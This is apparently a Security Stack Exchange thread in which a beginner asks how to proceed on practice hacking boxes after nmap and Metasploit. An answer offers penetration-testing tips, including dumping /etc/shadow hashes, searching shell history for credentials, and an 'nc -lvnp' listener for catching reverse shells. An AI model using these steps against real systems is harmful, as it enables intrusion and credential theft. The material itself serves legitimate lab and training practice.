0

When I'm working on hack boxes, what I do (if not using Armitage) is:

  1. nmap the box to discover running services version
  2. search metasploit to find a working exploit for that version

Now I'm stuck. What if the running service version is not vulnerable or the service version is said to have a vulnerability but not public exploit?

I was wondering what real hackers do beyond basic nmap + metasploit. When I don't have working exploits, I can't move forward.

I know you may say phishing or exploit writing.

schroeder
  • 125,553
  • 55
  • 289
  • 326
tomy
  • 1
  • 1
  • This is really far too broad to answer. You need to use a ***methodology*** to figure out what to do next. There are many published approaches. You need to enumerate, then get very curious about how everything is installed and configured to look for the tiny cracks you can leverage. – schroeder Dec 18 '19 at 07:46
  • @schroeder Maybe OP needs example of methodologies. Because, from what I see he's describing a basic pentesting approach. I'm no pentester expert so I won't give advices but I think if you want you could guive guideline, maybe more advanced than the answer below. – Jason Krs Dec 18 '19 at 13:05
  • 1
    @JasonKrs a search for "pentesting methodologies" will return a wealth of options. Even on this site: https://security.stackexchange.com/questions/118796/penetration-testing-methodologies and https://security.stackexchange.com/questions/142457/standard-operating-procedure-for-pen-test – schroeder Dec 18 '19 at 13:55
  • @schroeder Thanks. Sometimes we are not going for the obvious lol. I did not even search for that here and went straigth to google with it gazillion results – Jason Krs Dec 18 '19 at 14:33

1 Answers1

1

What to do after nmap and metasploit depends on where you are. I'm also around the "script kiddie" level but I'll list some tips I've seen from experience and others:

Before you connect to the box:

  • Do some automated scans like nmap, nikto, wpscan, sqlmap, etc
  • Check the software versions. They often use out-of-date and unsecured software with known vulnerabilities
  • Google. You should try to understand what those softwares do and how they may be exploited.

If you're on a WepApp (in a browser):

  • Look at robots.txt and sitemap.xml. Useful links and folders are sometimes in there.
  • Crawl it (with zaproxy or Burp Suite or some other crawler) and brute force some directories and files (with dirb, dirbuster, gobuster, etc.) to look for interesting folders and files.
  • Poke around. Just go around the app, learn about. You may find some prompts, boxes for user input, search boxes, file uploads, etc. that you can exploit.
  • Use Developer Tools. You can probably access it by pressing F12. Use Inspector and Inspect Element. The authors sometimes leave some helpful hints in the comments.
  • In Developer Tools, look around at some .js files. There may be some interesting functions.

If you're connected to the box with something like nc:

  • Go around and explore. Just cd into folders. If you know the Linux or Windows file system (depending on the box you're trying to hack), you can quickly spot some "out of place" folders and files.
  • whoami to know your privileges. history to look at, well, history. Users sometimes enter credentials in commands and they get stored in history.
  • Dump hashes. /etc/shadow is an example. You can try and crack those hashes or "pass the hash".
  • python -m SimpleHTTPServer 8080. (Use whichever port you like). This can allow you to upload files from your local machine to the box.
  • nc -lvnp 8080. (Again, use a port you like). This will open a nc listener. I'll leave you to explore how you can pop shells with this.

Those are just a few things you can do. One of the most important things is to "poke and explore". Look around for user input, unusual files and folders, implemented functions, etc. Also, document as much as you can. It'll be much easier to know "where that reverse shell script" was put in the box. It'll also help a lot when you do a write-up.

ChocolateOverflow
  • 3,472
  • 4
  • 17
  • 34
  • I like your answer. I'm a script kiddie also : it will help me. I still need to practice the fuzzing part you've said. I see lots of people talking about it In my mind it so random (for intance, if you dont have the propoer wordlist, fuzzing will be efficient) – Jason Krs Dec 18 '19 at 13:06
  • I'm not a big fan of brute forcing tbh. I only really like when I at least have some data on the target, like to make a custom word list, just because that feels more efficient and methodological. It's just a personal preference though. It's also nice if you can write your own scripts and automate your exploits. – ChocolateOverflow Dec 18 '19 at 13:56